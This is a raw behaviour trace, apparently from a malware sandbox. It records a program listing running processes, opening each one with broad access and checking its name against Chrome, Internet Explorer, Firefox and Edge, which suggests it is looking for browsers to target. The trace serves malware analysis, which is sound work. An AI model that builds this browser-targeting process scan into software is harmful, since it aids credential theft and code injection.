	[0234.274] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x72f0
	[0234.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.274] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0234.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.275] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.275] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0234.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.275] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.275] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.276] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x72f4
	[0234.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.276] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.277] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.277] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.277] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.277] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.278] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x72f8
	[0234.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.278] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.279] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.279] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.279] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.280] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x72fc
	[0234.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.280] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.281] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.281] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.282] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.283] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.283] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7300
	[0234.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.283] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.284] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.284] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.284] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.285] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.285] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7304
	[0234.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.285] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.286] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.286] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.286] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.287] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7308
	[0234.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.287] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.288] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.288] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.288] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.289] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.289] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x730c
	[0234.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.289] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.290] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.290] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.290] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.291] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0234.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7310
	[0234.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.292] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0234.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.292] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.292] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0234.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.292] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.293] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.293] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7314
	[0234.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.294] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.294] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.294] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.294] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.295] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0234.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7318
	[0234.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.296] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.296] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.296] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.297] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0234.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x731c
	[0234.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.298] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0234.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.299] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.299] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0234.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.299] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.299] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7320
	[0234.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.300] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.301] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.301] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.301] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0234.302] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7324
	[0234.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.303] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0234.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.303] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.303] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0234.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.304] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.304] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0234.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7328
	[0234.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.305] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0234.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.305] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.305] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0234.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.306] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.306] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0234.306] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x732c
	[0234.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.307] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0234.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.307] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.307] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0234.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.307] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.308] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0234.308] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7330
	[0234.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.308] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0234.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.309] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.309] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0234.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.309] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.310] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0234.310] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0234.310] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0234.311] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7334
	[0234.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.311] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0234.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.312] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.313] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0234.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.314] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.314] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0234.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7338
	[0234.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.315] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0234.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.315] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.316] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0234.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.316] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.316] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0234.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x733c
	[0234.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.317] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0234.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.317] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.318] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0234.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.318] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.318] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0234.319] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7340
	[0234.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.319] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0234.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.319] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.320] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0234.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.320] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.320] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0234.321] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7344
	[0234.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.321] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0234.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.322] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.322] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0234.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.323] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.323] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0234.324] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7348
	[0234.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.324] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0234.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.324] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.325] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0234.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.325] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.325] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0234.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x734c
	[0234.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.326] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0234.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.326] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.327] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0234.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.327] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.327] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0234.329] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7350
	[0234.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.329] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0234.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.329] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
